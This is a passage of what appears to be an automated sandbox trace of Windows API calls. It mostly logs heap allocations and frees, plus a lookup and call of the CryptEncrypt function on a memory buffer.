wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0159.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0159.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0159.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0159.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0159.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0159.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0159.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0159.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x3bf0050 [0160.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0160.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0160.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0160.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0160.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0160.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0160.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0160.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0160.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0160.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0160.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0160.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0160.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0160.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0160.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0160.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0160.075] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0160.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0160.075] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2f600, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2f608) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0160.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0160.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0160.078] HeapFree (in: hHeap=0x970000, 